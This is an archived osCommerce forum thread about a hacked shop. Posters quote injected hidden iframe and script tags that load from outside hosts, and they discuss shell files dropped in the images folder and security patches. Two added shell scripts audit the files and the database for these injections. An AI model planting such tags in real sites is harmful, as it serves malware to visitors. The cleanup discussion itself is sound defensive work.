
Help Please! SOS!


stevenchim


Starting from last Saturday there is some additional code disappear on my site..

 

For example, when I receive an e-mail from the customer enquiry box.

The title is shown as XXXXXXXX<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>XXX

the script between is added by unknown people.

 

Did anyone have this problem too?

And how can I remove it?


You have to find the files where the code was edited and re-edit them. Sometimes there is only one file and sometimes there are hundreds of them. There may also be files added to allow the hacker to continue editing your code. You need to remove all of those files. Once that is done, or before, you need to apply the security changes as mentioned many times a day on these forums. Otherwise the hacker will just come back.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons


Any idea where to start looking at?

 

The first step I do is just searching the key word but no result.

 

Any idea where I should start looking?

 

The recent change is I change permission of image folder to 777


It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.

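The check suggested above (the images directory should hold nothing but images and a .htaccess file), as an added example that is not from any poster in this thread. The function name, the extension allowlist and the output labels are assumptions; it also reports image-named files that contain a PHP open tag and world-writable directories such as one set to 777.

```shell
#!/bin/sh
# Added example: audit an osCommerce images directory for files that do not belong.
# Usage: sh scan_images.sh /path/to/catalog/images   (script name and path are assumptions)

scan_images_dir() {
    dir=$1

    # 1. Files whose extension is not an image type.
    #    .htaccess is the one non-image file that is expected here.
    find "$dir" -type f \
        ! -iname '*.jpg' ! -iname '*.jpeg' ! -iname '*.png' ! -iname '*.gif' \
        ! -name '.htaccess' -print | sed 's/^/NON-IMAGE /'

    # 2. Files named like images that contain a PHP open tag
    #    (a script hidden behind an image extension).
    find "$dir" -type f \
        \( -iname '*.jpg' -o -iname '*.jpeg' -o -iname '*.png' -o -iname '*.gif' \) \
        -exec grep -lF '<?php' {} + 2>/dev/null | sed 's/^/PHP-IN-IMAGE /'

    # 3. World-writable directories (mode 777 and similar), where any
    #    process on the host can drop new files.
    find "$dir" -type d -perm -0002 -print | sed 's/^/WORLD-WRITABLE /'
}

# Run the audit when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    scan_images_dir "$1"
fi
```

Every reported line is something to review by hand before deleting, and an empty report on the images directory says nothing about the rest of the file tree or the database.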


I found maybe twenty .php files in the image folder, which should not exist in this folder.

I deleted them all and am still looking for unusual files.

Thanks.


If you still have the problem it means you haven't removed all of the hacker's code.

If I were you I'd delete the entire site and restore it all from a good backup, provided you have a good backup? If not, I suggest you get a professional to look at your files and cleanse them properly. Like Jack said, you will then have to apply security measures.

~ Don't mistake my kindness for weakness ~


My site got hacked this way too.

You need to erase injected codes on your database.

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x.

 

The site works now but I wonder how it's possible to make sure this won't happen again. Any patch released?


Thanks for your information.

I have looked into the database, but it seems fine to me.

I can't find any <iframe> tags in the database :(


Hi there,

 

we have the same problem. We've been infected with this:

 

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

 

It was in the 'configuration_value' field of the 'configuration' table, in the first record, just where 'Store_name' is. We've been able to clean the database and now it is fine, but we don't know what to do. We assume this is an osCommerce bug, but which version is safe? Do we have to upgrade from 2.2RC2 to 2.3.1? Is this bug in the new ones too?

 

thanks

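One way to locate injected tags like the ones reported in this thread, as an added example that is not from any poster: scan a mysqldump file and list which table carries an `<iframe>` or `<script>` tag loading from an external host. It goes beyond the `configuration` table and covers every table in the dump; the function names and the sample rows are constructed for illustration.

```shell
#!/bin/sh
# Added example: list tables in a mysqldump file that contain <iframe>/<script>
# tags pointing at an external host. Output: table<TAB>host, one pair per line.

scan_dump() {
    awk '
    /^INSERT INTO/ {
        split($0, q, "`"); table = q[2]      # table name sits between the first backticks
        rest = tolower($0)
        # Walk every <iframe ...> / <script ...> opening tag on the line.
        while (match(rest, /<(iframe|script)[^>]*>/)) {
            tag  = substr(rest, RSTART, RLENGTH)
            rest = substr(rest, RSTART + RLENGTH)
            # Keep only tags whose src is an absolute http(s) URL; the quote
            # around the URL may be missing or backslash-escaped by mysqldump.
            if (match(tag, /src=[^a-z]*https?:\/\/[a-z0-9.-]+/)) {
                host = substr(tag, RSTART, RLENGTH)
                sub(/^src=[^a-z]*https?:\/\//, "", host)
                print table "\t" host
            }
        }
    }' "$1" | sort -u
}

# Constructed sample rows in mysqldump format (not real data from any shop).
# The third row is a local iframe, which must not be reported.
write_sample_dump() {
    cat > "$1" <<'EOF'
INSERT INTO `configuration` VALUES (1,'Store Name','STORE_NAME','My Shop<iframe src=\'http://willysy.com/images/banners/\' style=\'position:absolute;visibility:hidden\'></iframe>');
INSERT INTO `products_description` VALUES (7,1,'Widget</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>','');
INSERT INTO `manufacturers_info` VALUES (3,1,'<iframe src="/catalog/sizing.html"></iframe>');
EOF
}

# Scan the dump file named on the command line, if any.
if [ "$#" -gt 0 ]; then
    scan_dump "$1"
fi
```

A legitimate external embed is listed too, so the output is a review list rather than a delete list.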

If you are using version 2.2, make sure you apply ALL the security measures described here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

 

Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1.


Ok, working on it. We'll report further problems.


Our site got hacked as well.

It was injected in the DB (config values).

Only removing it from the database won't help for long, you have to update the security.

We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successful attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;)

 

Oh, we have 2.2, so don't think u have to update the whole system, I wouldn't take that pain...

 

Feel free to contact u for help.


So which table(s) of DB is affected?


Steven

 

Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands.

 

You need to also patch your site's security as is listed in most of the discussions in this part of the forums.

 

That is assuming you are at least using a recent version of osCommerce.

 

Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, it's best then to just upgrade to 2.3.1. Pound for pound it's no different in terms of time and energy to fix a heavily hacked up website as it is to transfer to the latest version of osCommerce.

 

I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can wreak on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products.

 

Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1

 

Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does.

 

If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX


Thank you very much for the advice. I will try to see what I can do.

 

As we all know the shop name is changed like every 5 hours.

Yesterday I deleted the file manager php file from admin.

And now it seems fine.


Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there.

Thank you for your useful information.

Looks like "1see.ir/j/" is an improved version of "exero".

It infects not only configuration. "1see.ir/j/" is able to be injected into each text field of the database.

Here is the free script for removal of "1see.ir/j/":

http://www.greatis.com/security/1see-ir-infection-removal.htm


after I did all the actions mentioned above..

the site is ok for the last few days..

but today comes to something new

 

(shop name)</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>

 

sign...


Steven,

 

Your site is vulnerable to hacker attacks and needs to be cleaned and secured to prevent injection attacks like that.


Chris


Steven did you give osC_Sec a try in the end?


Archived

This topic is now archived and is closed to further replies.
